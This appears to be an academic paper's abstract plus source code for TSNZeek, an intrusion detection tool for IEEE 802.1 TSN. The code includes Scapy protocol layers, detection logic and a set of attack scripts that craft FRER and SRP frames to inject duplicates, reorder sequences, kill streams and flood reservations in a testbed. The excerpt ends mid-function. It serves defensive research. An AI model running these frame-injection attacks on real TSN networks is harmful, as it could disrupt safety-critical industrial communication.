TSNZeek: An Open-source Intrusion Detection System for IEEE 802.1 Time-sensitive Networking

IEEE 802.1 Time-sensitive Networking~(TSN) standards are envisioned to replace legacy network protocols in critical domains to ensure reliable and deterministic communication over off-the-shelf Ethernet equipment. However, they lack security countermeasures and can even impose new attack vectors that may lead to hazardous consequences. This paper presents the first open-source security monitoring and intrusion detection mechanism, TSNZeek, for IEEE 802.1 TSN protocols. We extend an existing monitoring tool, Zeek, with a new packet parsing grammar to process TSN data traffic and a rule-based attack detection engine for TSN-specific threats. We also discuss various security-related configuration and design aspects for IEEE 802.1 TSN monitoring. Our experiments show that TSNZeek causes only ~5% CPU overhead on top of Zeek and successfully detects various threats in a real TSN testbed.

==> software/CB.py <==
#!/usr/bin/env python3

# -----------------------------------------------------------
#
#  cb.py --- IEEE 802.1CB Frame Replication and Elimination for Reliability (FRER) support for Scapy
#
# (C) 2022 Robin Schenderlein, Hamburg, Germany
# Released under GNU Public License (GPL)
# email robin.schenderlein@studium.uni-hamburg.de
# -----------------------------------------------------------

# scapy.contrib.description = IEEE 802.1CB
# scapy.contrib.status = loads

import logging

from scapy.fields import ShortField
from scapy.layers.l2 import Dot1Q
from scapy.main import interact
from scapy.packet import Packet, bind_layers

logger = logging.getLogger("scapy")
logger.setLevel(logging.INFO)


class CB(Packet):
    name = "FRER"
    fields_desc = [ShortField("reserved", 0),
                   ShortField("sequence_nr", 0)]


bind_layers(Dot1Q, CB, type=0xf1c1)

if __name__ == "__main__":
    interact(mydict=globals(), mybanner="Test add-on TSN")


==> software/SRP.py <==
#!/usr/bin/env python3

# -----------------------------------------------------------
#
#  srp.py --- IEEE 802.1Qcc Enhancements to SRP support for Scapy
#
# (C) 2022 Robin Schenderlein, Hamburg, Germany
# Released under GNU Public License (GPL)
# email robin.schenderlein@studium.uni-hamburg.de
# -----------------------------------------------------------

# scapy.contrib.description = IEEE 802.1Qcc
# scapy.contrib.status = loads

import logging

from scapy.config import conf
from scapy.fields import ShortField, MACField, BitField, ByteField, IntField, IPField, IP6Field, \
    ByteEnumField, FieldLenField, FieldListField, StrLenField, PacketListField
from scapy.layers.l2 import Ether
from scapy.main import interact
from scapy.packet import Packet, bind_layers

logger = logging.getLogger("scapy")
logger.setLevel(logging.INFO)

talkerStatus = {
    0: "None",
    1: "Ready",
    2: "Failed"
}

listenerStatus = {
    0: "None",
    1: "Ready",
    2: "PartialFailed",
    3: "Failed"
}


class SrpGenericTlv(Packet):
    name = "SRP Generic TLV"
    fields_desc = [ByteField("TLV_type", 0),
                   FieldLenField("TLV_length", None, length_of="value", fmt="B"),
                   StrLenField("value", b'', length_from=lambda x: x.TLV_length)
                   ]

    @classmethod
    def dispatch_hook(cls, _pkt=None, *args, **kargs):
        if _pkt and len(_pkt) >= 2:
            t = _pkt[:1][0]
            cls = _SRP_TLV_CLS.get(t, "DtpGenericTlv")
        return cls

    def guess_payload_class(self, p):
        return conf.padding_layer


class SrpGenericDataFrameSpecTlv(SrpGenericTlv):
    name = "SRP Generic DataFrameSpec TLV"


class Talker(SrpGenericTlv):
    name = "Talker"
    fields_desc = [ByteField("TLV_type", 1),
                   FieldLenField("TLV_length", None, length_of="tlvlist", fmt="B"),
                   PacketListField("tlvlist", [], SrpGenericTlv, length_from=lambda x: x.TLV_length)]


class StreamID(SrpGenericTlv):
    name = "StreamID"
    fields_desc = [ByteField("TLV_type", 2),
                   ByteField("TLV_length", 8),
                   MACField("MacAddress", "00:00:00:00:00:00"),
                   ShortField("UniqueID", 0)]


class StreamRank(SrpGenericTlv):
    name = "StreamRank"
    fields_desc = [ByteField("TLV_type", 3),
                   ByteField("TLV_length", 1),
                   BitField("reserved", 0, 7),
                   BitField("Rank", 1, 1)]


class InterfaceID(SrpGenericTlv):
    name = "Interface_ID"
    fields_desc = [ByteField("TLV_type", 5),
                   FieldLenField("TLV_length", None, length_of="InterfaceName", fmt="B", adjust=lambda pkt, x: x + 6),
                   MACField("MacAddress", "00:00:00:00:00:00"),
                   StrLenField("InterfaceName", b'', length_from=lambda x: x.TLV_length - 6)]


class EndStationInterfaces(SrpGenericTlv):
    name = "EndStationInterfaces"
    fields_desc = [ByteField("TLV_type", 4),
                   FieldLenField("TLV_length", None, length_of="interfaces", fmt="B"),
                   PacketListField("interfaces", None, InterfaceID, length_from=lambda x: x.TLV_length)
                   ]


class IEEE802MacAddresses(SrpGenericTlv):
    name = "IEEE802MacAddresses"
    fields_desc = [ByteField("TLV_type", 7),
                   ByteField("TLV_length", 12),
                   MACField("DestinationMacAddress", "00:00:00:00:00:00"),
                   MACField("SourceMacAddress", "00:00:00:00:00:00")]


class IEEE802VlanTag(SrpGenericTlv):
    name = "IEEE802VlanTag"
    fields_desc = [ByteField("TLV_type", 8),
                   ByteField("TLV_length", 12),
                   ByteField("PriorityCodePoint", 0),
                   ShortField("VlanId", 0)]


class IPv4tuple(SrpGenericTlv):
    name = "IPv4tuple"
    fields_desc = [ByteField("TLV_type", 9),
                   ByteField("TLV_length", 15),
                   IPField("SourceIpAddress", "0.0.0.0"),
                   IPField("DestinationIpAddress", "0.0.0.0"),
                   ByteField("Dscp", 0),
                   ShortField("Protocol", 0),
                   ShortField("SourcePort", 0),
                   ShortField("DestinationPort", 0)]


class IPv6tuple(SrpGenericTlv):
    name = "IPv6tuple"
    fields_desc = [ByteField("TLV_type", 10),
                   ByteField("TLV_length", 39),
                   IP6Field("SourceIpAddress", "::"),
                   IP6Field("DestinationIpAddress", "::"),
                   ByteField("Dscp", 0),
                   ShortField("Protocol", 0),
                   ShortField("SourcePort", 0),
                   ShortField("DestinationPort", 0)]


class DataFrameSpecification(SrpGenericTlv):
    name = "DataFrameSpecification"
    fields_desc = [ByteField("TLV_type", 6),
                   FieldLenField("TLV_length", None, length_of="tlvlist", fmt="B"),
                   PacketListField("tlvlist", [], SrpGenericTlv, length_from=lambda x: x.TLV_length)]


class TrafficSpecification(SrpGenericTlv):
    name = "TrafficSpecification"
    fields_desc = [ByteField("TLV_type", 11),
                   ByteField("TLV_length", 13),
                   IntField("IntervalNumerator", 0),
                   IntField("IntervalDenominator", 1),
                   ShortField("MaxFramesPerInterval", 0),
                   ShortField("MaxFrameSize", 0),
                   ByteField("TransmissionSelection", 0)]


class TSpecTimeAware(SrpGenericTlv):
    name = "TSpecTimeAware"
    fields_desc = [ByteField("TLV_type", 12),
                   ByteField("TLV_length", 12),
                   IntField("EarliestTransmitOffset", 0),
                   IntField("LatestTransmitOffset", 0),
                   IntField("Jitter", 0)]


class UserToNetworkRequirements(SrpGenericTlv):
    name = "UserToNetworkRequirements"
    fields_desc = [ByteField("TLV_type", 13),
                   ByteField("TLV_length", 5),
                   ByteField("NumSeamlessTrees", 0),
                   IntField("MaxLatency", 0)]


class InterfaceCapabilities(SrpGenericTlv):
    name = "InterfaceCapabilities"
    fields_desc = [ByteField("TLV_type", 14),
                   FieldLenField("TLV_length", None, length_of="CBStreamIdenTypeList", fmt="B",
                                 adjust=lambda pkt, val: val + len(pkt.CBSequenceTypeList) * 4 + 3),
                   BitField("reserved", 0, 7),
                   BitField("VlanTagCapable", 1, 1),
                   FieldLenField("NumITL", None, fmt="B", count_of="CBStreamIdenTypeList"),
                   FieldLenField("NumSTL", None, fmt="B", count_of="CBSequenceTypeList"),
                   FieldListField("CBStreamIdenTypeList", [], IntField("CB-StreamIdenType", 0),
                                  count_from=lambda pkt: pkt.NumITL),
                   FieldListField("CBSequenceTypeList", [], IntField("CB-SequenceType", 0),
                                  count_from=lambda pkt: pkt.NumSTL)]


class Listener(SrpGenericTlv):
    name = "Listener"
    fields_desc = [ByteField("TLV_type", 15),
                   FieldLenField("TLV_length", None, length_of="tlvlist", fmt="B"),
                   PacketListField("tlvlist", [], SrpGenericTlv, length_from=lambda x: x.TLV_length)]


class Status(SrpGenericTlv):
    name = "Status"
    fields_desc = [ByteField("TLV_type", 16),
                   FieldLenField("TLV_length", None, length_of="tlvlist", fmt="B"),
                   PacketListField("tlvlist", [], SrpGenericTlv, length_from=lambda x: x.TLV_length)]


class StatusInfo(SrpGenericTlv):
    name = "StatusInfo"
    fields_desc = [ByteField("TLV_type", 17),
                   ByteField("TLV_length", 3),
                   ByteEnumField("TalkerStatus", 0, talkerStatus),
                   ByteEnumField("ListenerStatus", 0, listenerStatus),
                   ByteField("FailureCode", 0)]


class AccumulatedLatency(SrpGenericTlv):
    name = "AccumulatedLatency"
    fields_desc = [ByteField("TLV_type", 18),
                   ByteField("TLV_length", 4),
                   IntField("AccumulatedLatency", 0)]


class TimeAwareOffset(SrpGenericTlv):
    name = "TimeAwareOffset"
    fields_desc = [ByteField("TLV_type", 20),
                   ByteField("TLV_length", 4),
                   IntField("TimeAwareOffset", 0)]


class InterfaceConfiguration(SrpGenericTlv):
    name = "InterfaceConfiguration"
    fields_desc = [ByteField("TLV_type", 19),
                   FieldLenField("TLV_length", None, length_of="tlvlist", fmt="B"),
                   PacketListField("tlvlist", [], SrpGenericTlv, length_from=lambda x: x.TLV_length)]


class FailedInterfaces(SrpGenericTlv):
    name = "FailedInterfaces"
    fields_desc = [ByteField("TLV_type", 21),
                   FieldLenField("TLV_length", None, length_of="interfaces", fmt="B"),
                   PacketListField("interfaces", None, InterfaceID, length_from=lambda x: x.TLV_length)
                   ]


_SRP_TLV_CLS = {
    1: Talker,
    2: StreamID,
    3: StreamRank,
    4: EndStationInterfaces,
    5: InterfaceID,
    6: DataFrameSpecification,
    7: IEEE802MacAddresses,
    8: IEEE802VlanTag,
    9: IPv4tuple,
    10: IPv6tuple,
    11: TrafficSpecification,
    12: TSpecTimeAware,
    13: UserToNetworkRequirements,
    14: InterfaceCapabilities,
    15: Listener,
    16: Status,
    17: StatusInfo,
    18: AccumulatedLatency,
    19: InterfaceConfiguration,
    20: TimeAwareOffset,
    21: FailedInterfaces
}


class SRP(Packet):
    name = "SRP"
    fields_desc = [PacketListField("tlvlist", [], SrpGenericTlv)]


bind_layers(Ether, SRP, type=0x22ea)

if __name__ == "__main__":
    interact(mydict=globals(), mybanner="Test add-on TSN")

    # TODO Hardcode length of fields vs calculation for types with fixed length


==> software/attack-detection.py <==
#!/usr/bin/env python3
import sys
import broker
import time
from collections import OrderedDict

from BitVector import BitVector
from pprint import pprint

streams = dict()
streams_counted_frames = dict()
frer_history_size = 2
nr_of_member_streams = 5


def on_SRP_DATA_INDICATION(data):
    pass


def identify_null_stream(destination_address, vlan_identifier):
    return (str(destination_address) + str(vlan_identifier)).__hash__()


def identify_source_vlan_stream(source_address, vlan_identifier):
    return (str(source_address) + str(vlan_identifier)).__hash__()


def identify_ip_stream(destination_address, vlan_identifier, ip_src_addr, ip_dest_addr, dscp, ip_next_port, src_port,
                       dest_port):
    return (str(destination_address) + str(vlan_identifier) + str(ip_src_addr) + str(ip_dest_addr) + str(dscp) + str(
        ip_next_port) + str(src_port) + str(dest_port)).__hash__()


def on_CB_DATA_INDICATION(data):
    ethernet_data = data[0][0]
    cb_data = data[1]
    src, dst, vlan = ethernet_data[3:6]
    sequence_nr = cb_data.value
    stream_id = identify_source_vlan_stream(src, vlan)
    print(f'stream id: {stream_id}, sequence nr: {sequence_nr}')
    # ------Attack detection------
    # Attack 1 - More frames for compound stream than member streams
    if stream_id not in streams_counted_frames:
        streams_counted_frames[stream_id] = OrderedDict()
        pprint(streams_counted_frames)
    if sequence_nr not in streams_counted_frames[stream_id]:
        streams_counted_frames[stream_id][sequence_nr] = 0
    streams_counted_frames[stream_id][sequence_nr] += 1
    if streams_counted_frames[stream_id][sequence_nr] > nr_of_member_streams:
        print("NOTICE got more frames for compound stream then expected")
    if len(streams_counted_frames[stream_id]) > (frer_history_size * 2):
        streams_counted_frames[stream_id].popitem(False)  # remove oldest entry
    # Attack 2 - Trigger RECOVERY TIMEOUT
    # Attack 3 - Changes in inter-arrival time
    # Attack 4 - Detect intersecting paths configurations
    # Attack 7 - Too many stream reservations ins short time
    # Attack 9 - Violating SRP resource allocation restricted by a threshold
    # Attack 10 - Logging SRP resource allocation deviating from previous allocations so much
    # Attack 11 - Violating inter-arrival...
    # Attack 12 - Violating link capacity for certain traffic type
    # Attack 13 - Attempts for changing an existing resource allocation for a certain stream
    # Attack 14 - Inconsistencies between SRP QoS requirements with reserved CB paths
    # Attack 15 - out of order frame for match recovery
    #
    #
    # -----Add to new state-----
    # Simplified Stream Recovery function
    if stream_id not in streams:
        streams[stream_id] = [sequence_nr, BitVector(size=frer_history_size)]
        streams[stream_id][1][0] = 1  # mark
        # process PRESENT_DATA
        return

    latest_valid = streams[stream_id][0]
    valid_range = range(latest_valid - frer_history_size, latest_valid + frer_history_size)
    if sequence_nr in valid_range:  # frame is in valid range
        delta = sequence_nr - latest_valid
        history = streams[stream_id][1]
        if sequence_nr <= latest_valid:  # old frame
            if 0 == history[delta]:  # has not been seen yet
                # add frame_counter[stream_id]=last_seen_counted[]
                # process PRESENT_DATA & reset RemainingTicks
                pass
            else:
                # discard
                pass
        else:  # frame is ahead
            if delta != 1:  # exactly one ahead
                # could raise a notice here: raise_notice(out of order, accepted frame)
                print("NOTICE out of order frame accepted")
                pass
            history.shift_right(delta)
            history[0] = 1
            streams[stream_id][0] = sequence_nr
            # reset RemainingTicks
            # process PRESENT_DATA
    else:
        pass
        print("NOTICE out of order frame discarded")
        # could raise a notice here: raise_notice(out of order, discarded frame)


# Zeek Broker
# Setup endpoint and connect to Zeek.
ep = broker.Endpoint()
sub = ep.make_subscriber("/topic/tsn")
ss = ep.make_status_subscriber(True)
ep.peer("127.0.0.1", 9999)
# Wait until connection is established.
st = ss.get()

if not (type(st) == broker.Status and st.code() == broker.SC.PeerAdded):
    print("could not connect")
    sys.exit(1)
print("Connected to publisher")

while True:
    time.sleep(0.5)
    poll_result = sub.poll()
    # do stuff like checking counter
    # Attack 5 - All member streams dead
    # Attack 6 - Death of member stream
    # Attack 8 - Allocated but unused resources
    #
    #
    if not poll_result:
        continue
    for (topic, data) in poll_result:
        event = broker.zeek.Event(data)
        if topic == "/topic/tsn/cb":
            on_CB_DATA_INDICATION(event.args())
        elif topic == "/topic/tsn/srp/talker_enhanced":
            on_SRP_DATA_INDICATION(data)
        elif topic == "/topic/tsn/srp/listener_enhanced":
            pass

    # ping = broker.zeek.Event("ping", n)
    # ep.publish("/topic/test", ping)

    # How to:
    #
    # On new message:
    #   Does attack cause notice A
    #   Does attack cause notice B
    #   Does attack cause notice C
    #   etc.
    #   is the message accepted
    #       yes -> add to new state
    #       no  -> keep msg for relevant attacks (would need to be cleared after some time)


==> software/attack1.py <==
def attack1(interface_name="h2-eth0"):
    nr_of_msgs = 3
    global sequence_nr
    for _ in range(nr_of_msgs):
        send_cb(interface_name, sequence_nr, nr_of_member_streams)
        sequence_nr += 1
        time.sleep(1)
    send_cb(interface_name, sequence_nr)  # packet added by attacker
    for _ in range(nr_of_msgs):
        send_cb(interface_name, sequence_nr, nr_of_member_streams)
        sequence_nr += 1
        time.sleep(1)

==> software/attack2.py <==
def send_cb_timed(jitter, first_delay, delays, start_time, interface_name):
    global sequence_nr
    has_jitter = bool(random.getrandbits(1))
    if has_jitter:
        time.sleep(jitter)
    time.sleep(first_delay)
    send_cb(interface_name, sequence_nr)
    for delay in delays:
        time.sleep(delay)
        send_cb(interface_name, sequence_nr)
    sequence_nr += 1
    time.sleep(1 - ((time.time() - start_time) % 1)) 

def attack2(transmission_latencies=None, jitter=None, changing_packet=0, delta=0, interface_name="h2-eth0"):
    nr_of_emissions = 20
    if transmission_latencies is None:
        transmission_latencies = [0, 0, 0.1, 0.1, 0.2]
    transmission_latencies.sort()
    delays = np.diff(transmission_latencies)
    if jitter is None:
        jitter = 0.1 * 1
    time.sleep(1 - time.time() % 1)  # try to get same start over restart
    start_time = time.time().__floor__()
    for _ in range(nr_of_emissions):
        send_cb_timed(jitter, transmission_latencies[0], delays, start_time, interface_name)
    transmission_latencies[changing_packet] += delta
    transmission_latencies.sort()
    delays = np.diff(transmission_latencies)
    for _ in range(nr_of_emissions):
        send_cb_timed(jitter, transmission_latencies[0], delays, start_time, interface_name)


==> software/attack3.py <==
def attack3(delta=50, interface_name="h2-eth0"):
    """attack3 - Sends a continuous flow of FRER packets, but one packet is out of order.
    :param interface_name: Optional interface name, that should be used to send a frame
    :param delta: Optional offset for the out-of-order packet. Defaults to 50"""
    global sequence_nr
    nr_of_msgs = 3
    print(f'Sends {nr_of_member_streams} member streams and after incrementing the sequence number {nr_of_msgs} times '
          f' one messages has a different sequence number. The flow continues for {nr_of_member_streams} iterations.')
    for _ in range(nr_of_msgs):
        send_cb(interface_name, sequence_nr, nr_of_member_streams)
        sequence_nr += 1
        time.sleep(1)
    send_cb(interface_name, sequence_nr, nr_of_member_streams - 1)
    send_cb(interface_name, sequence_nr + delta)
    sequence_nr += 1
    for _ in range(nr_of_msgs):
        send_cb(interface_name, sequence_nr, nr_of_member_streams)
        sequence_nr += 1
        time.sleep(1)

==> software/attack4.py <==
def attack4(interface_name="h2-eth0"):
    global sequence_nr
    start_time = time.time()
    for i in range(nr_of_member_streams, 0, -1):
        for _ in range(5):
            send_cb(interface_name, sequence_nr, i)
            sequence_nr += 1
            time.sleep(1 - ((time.time() - start_time) % 1.0))

==> software/attack5.py <==
def attack5(interval_numerator=360, interval_denominator=1, max_frames_per_interval=65535, max_frame_size=65535):
    send_srp(create_srp_frame(interval_numerator=interval_numerator,
                              interval_denominator=interval_denominator,
                              max_frames_per_interval= max_frames_per_interval,
                              max_frame_size=max_frame_size))

==> software/attack6.py <==
def attack6(interval_numerator=10, interval_denominator=1, max_frames_per_interval=1, max_frame_size=200,
            interval_numerator_atk=10, interval_denominator_atk=1, max_frames_per_interval_atk=1,
            max_frame_size_atk=300, ):
    for i in range(5):
        send_srp(create_srp_frame(interval_numerator=interval_numerator,
                                  interval_denominator=interval_denominator,
                                  max_frames_per_interval= max_frames_per_interval,
                                  max_frame_size=max_frame_size * 2,
                                  unique_id=200 + i))
    for i in range(5):
        send_srp(create_srp_frame(interval_numerator=interval_numerator,
                                  interval_denominator=interval_denominator,
                                  max_frames_per_interval= max_frames_per_interval,
                                  max_frame_size=int(max_frame_size / 2),
                                  unique_id=205 + i))
    send_srp(create_srp_frame(interval_numerator=interval_numerator_atk,
                              interval_denominator=interval_denominator_atk,
                              max_frames_per_interval= max_frames_per_interval_atk,
                              max_frame_size=max_frame_size_atk,
                              unique_id=300))


==> software/attack7.py <==
def attack7(nr_of_requests=10, time_window=10):
    for i in range(100, 100 + nr_of_requests):
        send_srp(create_srp_frame(unique_id=200 + i))
        time.sleep(time_window / nr_of_requests)

==> software/attack8.py <==
def attack8(interval_numerator=1, interval_denominator=1, max_frames_per_interval=1, max_frame_size=800,
            interval_numerator_changed=1, interval_denominator_changed=1, max_frames_per_interval_changed=1,
            max_frame_size_changed=800):
    unique_id = 888
    send_srp(create_srp_frame(interval_numerator=interval_numerator,
                              interval_denominator=interval_denominator,
                              max_frames_per_interval= max_frames_per_interval,
                              max_frame_size=max_frame_size,
                              unique_id=unique_id))

    send_srp(create_srp_frame(interval_numerator= interval_numerator_changed,
                              interval_denominator= interval_denominator_changed,
                              max_frames_per_interval= max_frames_per_interval_changed,
                              max_frame_size=max_frame_size_changed,
                              unique_id=unique_id))

==> software/attack9.py <==
def attack9():
    send_srp(create_srp_frame())
    time.sleep(timeout)

==> software/control-plane-broker.py <==
ep = broker.Endpoint()
sub = ep.make_subscriber("/topic/tsn")
ss = ep.make_status_subscriber(True)
ep.peer("127.0.0.1", 9999)
# Wait until connection is established.
st = ss.get()

if not (type(st) == broker.Status and st.code() == broker.SC.PeerAdded):
    print("Could not connect")
    sys.exit(1)
print("Connected to publisher")

while True:
    time.sleep(0.5)
    poll_result = sub.poll()
    # Check for timeouts or unused resources
    if not poll_result:
        continue
    for (topic, data) in poll_result:
        event = broker.zeek.Event(data)
        if topic == "/topic/tsn/cb":
            on_CB_DATA_INDICATION(event.args())
        elif topic == "/topic/tsn/srp/talker_enhanced":
            on_SRP_DATA_INDICATION(data)
        elif topic == "/topic/tsn/srp/listener_enhanced":
            pass

==> software/detect-attack1.py <==
def check_attack1(stream_id, sequence_nr):
    if stream_id not in streams_history:
        streams_history[stream_id] = OrderedDict()
    if sequence_nr not in streams_history[stream_id]:
        streams_history[stream_id][sequence_nr] = [0, -1]
    streams_history[stream_id][sequence_nr][0] += 1
    streams_history[stream_id][sequence_nr][1] = time.time()
    if streams_history[stream_id][sequence_nr][0] > nr_of_member_streams:
        publish_notice(f'Got more frames for compound stream {stream_id} then expected')

==> software/detect-attack4.py <==
def check_attack4():
    delete_streams = []
    for stream_id, stream_history in streams_history.items():
        while True:
            sequence_nr_count, sequence_nr_ts = next(iter(stream_history.values()))
            if (time.time() - sequence_nr_ts) > timeout:
                if sequence_nr_count < nr_of_member_streams:
                    nr_of_dead_streams = nr_of_member_streams - sequence_nr_count
                    if stream_id not in streams_with_death or streams_with_death[stream_id] != nr_of_dead_streams:
                        streams_with_death[stream_id] = nr_of_dead_streams
                        publish_notice(f'{nr_of_dead_streams} member stream[s] of stream {stream_id} are '
                                       'probably dead')
                stream_history.popitem(False)  # remove oldest entry
                if not stream_history:
                    publish_notice(f'All member streams of stream {stream_id} are probably dead')
                    delete_streams.append(stream_id)
                    break
            else:
                break
    for stream_id in delete_streams:
        streams_history.pop(stream_id)

==> software/detect-attack5.py <==
def check_attack5(interval, max_frames_per_interval, max_frame_size, stream_id):
    if interval > interval_threshold:
        publish_notice(f'Threshold for Interval exceeded for stream {stream_id}: \n'
                       f'Allowed: {interval_threshold} Requested: {interval}')
    if max_frames_per_interval > max_frames_per_interval_threshold:
        publish_notice(f'Threshold for MaxFramesPerInterval exceeded for stream {stream_id}: \n'
                       f'Allowed: {max_frames_per_interval_threshold} Requested: {max_frames_per_interval}')
    if max_frame_size > max_frame_size_threshold:
        publish_notice(f'Threshold for MaxFrameSize exceeded for stream {stream_id}: \n'
                       f'Allowed: {max_frame_size_threshold} Requested: {max_frame_size}')

==> software/detect-attack6.py <==

def check_attack6(interval, max_frames_per_interval, max_frame_size, stream_id):
    
    max_bandwidth = max_frame_size * max_frames_per_interval / interval  # byte/second
    
    if len(srp_bandwidth_history) == srp_bandwidth_history_len:
        std_deviation = np.std(srp_bandwidth_history)
        mean = np.mean(srp_bandwidth_history)
        low = mean - 2 * std_deviation
        high = mean + 2 * std_deviation
        
        if not low < max_bandwidth < high:
            publish_notice(f'SRP request with more than two standard deviations difference for bandwidth for '
                           f'stream id {stream_id}. \n Requested: {max_bandwidth} Mean: {mean}')
    
    srp_bandwidth_history.append(max_bandwidth)

==> software/detect-attack7.py <==
def cleanup_srp_history():
    current_time = time.time()
    while srp_history:
        if current_time - srp_history[0] > time_window_threshold:
            srp_history.popleft()
        else:
            return

def check_attack7(time_stamp):
    srp_history.append(time_stamp)
    cleanup_srp_history()
    if len(srp_history) > nr_of_requests_threshold:
        publish_notice(f'Too many SRP requests received in short time.')

==> software/detect-attack8.py <==
def check_attack8(mac, unique_id, stream_id):
    if mac not in srp_configs:
        srp_configs[mac] = dict()
    if unique_id not in srp_configs[mac]:
        srp_configs[mac][unique_id] = [time.time(), stream_id]
    else:
        publish_notice(f'SRP request for changing an existing resource allocation with config id {mac}{unique_id}.')

==> software/detect-attack9.py <==
def check_attack9():
    delete_configs = set()
    for talker_mac, talker_config in srp_configs.items():
        for unique_id, config in talker_config.items():
            # check if stream data has been received
            timestamp, stream_id = config
            if time.time() - timestamp > timeout:
                if stream_id not in streams_history:
                    publish_notice(f'For SRP request with stream id {stream_id} no FRER packet was received.')
                    delete_configs.add(talker_mac)
    for talker_mac in delete_configs:
        srp_configs.pop(talker_mac)

==> software/scapy-attacks.py <==
# scapy.contrib.status = skip
# scapy.contrib.name = TSN
# Set log level to benefit from Scapy warnings
import time

from scapy.layers.l2 import Dot1Q
from scapy.sendrecv import sendp

from CB import CB
from SRP import *

logger = logging.getLogger("scapy")
logger.setLevel(logging.INFO)

nr_of_member_streams = 2
sequence_nr = 0  # Does not matter where it starts, first msg is always TAKE_ANY


def send_cb(interface_name, sequence_nr, nr_of_packets=1, interval=0):
    packet = (Ether(src="00:00:00:00:00:02", dst=" 00:00:00:00:00:04") / Dot1Q(vlan=1000) / CB(sequence_nr=sequence_nr))
    sendp(packet, interface_name, count=nr_of_packets, inter=interval)
    # time between each packet is roughly 300 µs = 0.0003 seconds


def send_srp1(interface_name):
    srp_frame = SRP(
        tlvlist=[
            Talker(
                tlvlist=[
                    StreamID(MacAddress="00:00:00:00:00:02", UniqueID=1),
                    StreamRank(),
                    TrafficSpecification(),
                    UserToNetworkRequirements(NumSeamlessTrees=nr_of_member_streams)
                ]
            ),
            Status(
                tlvlist=[
                    StatusInfo(),
                    AccumulatedLatency()
                ]
            ),
        ]
    )
    packet = (Ether(src="00:00:00:00:00:02", dst="00:00:00:00:00:04") / Dot1Q(vlan=1000) / srp_frame)
    sendp(packet, interface_name)


def send_srp(srp_frame, interface_name="h2-eth0"):
    if isinstance(srp_frame, list):
        packet = []
        for frame in srp_frame:
            packet.append(Ether(src="00:00:00:00:00:02", dst="00:00:00:00:00:04") / Dot1Q(vlan=1000) / frame)
    else:
        packet = (Ether(src="00:00:00:00:00:02", dst="00:00:00:00:00:04") / Dot1Q(vlan=1000) / srp_frame)
    sendp(packet, interface_name)


def list_attacks():
    print(attack1.__doc__)
    print(attack2.__doc__)
    print(attack3.__doc__)
    print(attack4.__doc__)
    print(attack5.__doc__)
    print(attack6.__doc__)
    print(attack7.__doc__)
    print(attack8.__doc__)
    print(attack9.__doc__)
    print(attack10.__doc__)
    print(attack11.__doc__)
    print(attack12.__doc__)
    print(attack13.__doc__)


# Attack 1 - Done
def attack1(interface_name="h2-eth0"):
    """ attack1 - Send more frames for compound stream than member streams """
    nr_of_msgs = 3
    global sequence_nr
    for _ in range(nr_of_msgs):
        send_cb(interface_name, sequence_nr, nr_of_member_streams)
        sequence_nr += 1
        time.sleep(1)
    send_cb(interface_name, sequence_nr)  # packet added by attacker, originator does not matter for now
    for _ in range(nr_of_msgs):
        send_cb(interface_name, sequence_nr, nr_of_member_streams)
        sequence_nr += 1
        time.sleep(1)


# Attack 2 - Done
def attack2(interface_name="h2-eth0"):
    """ attack2 - Trigger RECOVERY TIMEOUT by stopping all member streams of compound stream """
    global sequence_nr
    start_time = time.time()
    for _ in range(5):
        send_cb(interface_name, sequence_nr, nr_of_member_streams)
        sequence_nr += 1
        time.sleep(1 - ((time.time() - start_time) % 1.0))  # schedule close as possible to 1 sec
    print("Wait 1 minute")
    time.sleep(60)  # not really required
    # Does not really matter if streams die over time or all at once
    # send msgs, stop all, wait time   ???send only one message, do not alert if multiple same msgs arrive???


# Attack 3 - Changes in inter-arrival time - Done
def attack3(interface_name="h2-eth0"):
    """ Send flow of FRER packets, but one packet has a change in inter-arrival time """
    global sequence_nr
    start_time = time.time()
    for _ in range(5):
        send_cb(interface_name, sequence_nr, nr_of_member_streams)
        sequence_nr += 1
        time.sleep(1 - ((time.time() - start_time) % 1.0))  # schedule close as possible to 1 sec
    send_cb(interface_name, sequence_nr, nr_of_member_streams-1)
    time.sleep(0.1)
    send_cb(interface_name, sequence_nr, 1)  # msg with other inter-arrival time
    sequence_nr += 1
    for i in range(5):
        time.sleep(1 - ((time.time() - start_time) % 1.0))
        send_cb(interface_name, sequence_nr + i, nr_of_member_streams)
        sequence_nr += 1


# Attack 4 - Detect intersecting paths configurations or loops?
def attack4():
    pass
    # If there is a CNC the CNC is responsible to create paths. It should be smart enough not to create loops or weird
    # intersections. Only at point where it is not otherwise possible. Same for distributed systems
    # Finding loops or intersections would require getting configuration of each bridge in the system via NETCONF
    # or whatever.
    # Not really focus of this thesis, as SRP requests does not include actual paths


# Attack 5 - Done
def attack5(interface_name="h2-eth0"):
    """ Sends a continuous flow of FRER packets, but one packet is out of order """
    # send FRER frame
    # send FRER frame with inconsistent sequence nr
    global sequence_nr
    nr_of_msgs = 3
    for _ in range(nr_of_msgs):
        send_cb(interface_name, sequence_nr, nr_of_member_streams)
        sequence_nr += 1
        time.sleep(1)
    send_cb(interface_name, sequence_nr + 50, nr_of_msgs, 1)
    sequence_nr += 1
    for _ in range(nr_of_msgs):
        send_cb(interface_name, sequence_nr, nr_of_member_streams)
        sequence_nr += 1
        time.sleep(1)


# Attack 6 - Done
def attack6(interface_name="h2-eth0"):
    """ Sends multiple member stream, belonging to the same compound stream. After some time one stream stops """
    global sequence_nr
    start_time = time.time()
    for _ in range(5):
        send_cb(interface_name, sequence_nr, nr_of_member_streams)
        sequence_nr += 1
        time.sleep(1 - ((time.time() - start_time) % 1.0))  # schedule close as possible to 1 sec
    for _ in range(70):
        send_cb(interface_name, sequence_nr, nr_of_member_streams - 1)
        sequence_nr += 1
        time.sleep(1 - ((time.time() - start_time) % 1.0))
    # there is actually a FRER event exactly for that, SIGNAL_LATENT_ERROR, it is not defined what
    # happens with this event or after what time/ difference it gets triggered.
    # It should be possible for a FRER component to send a msg to a Zeek component.
    # So there is no actual need to implement that in Zeek


# Attack 7 - What is to many in what time? higher than x msg/second? - Done
def attack7():
    """ Send many SRP reservations in short time. The first half is for different streams, the second for the same
    stream """
    frames = []
    for i in range(100, 105):
        frames.append(SRP(
            tlvlist=[
                Talker(
                    tlvlist=[
                        StreamID(MacAddress="00:00:00:00:00:02", UniqueID=i),
                        StreamRank(),
                        TrafficSpecification(),
                        UserToNetworkRequirements()
                    ]
                ),
                Status(
                    tlvlist=[
                        StatusInfo(),
                        AccumulatedLatency()
                    ]
                ),
            ]
        ))
    send_srp(frames)
    time.sleep(10)
    frames = []
    for _ in range(100, 105):
        frames.append(SRP(
            tlvlist=[
                Talker(
                    tlvlist=[
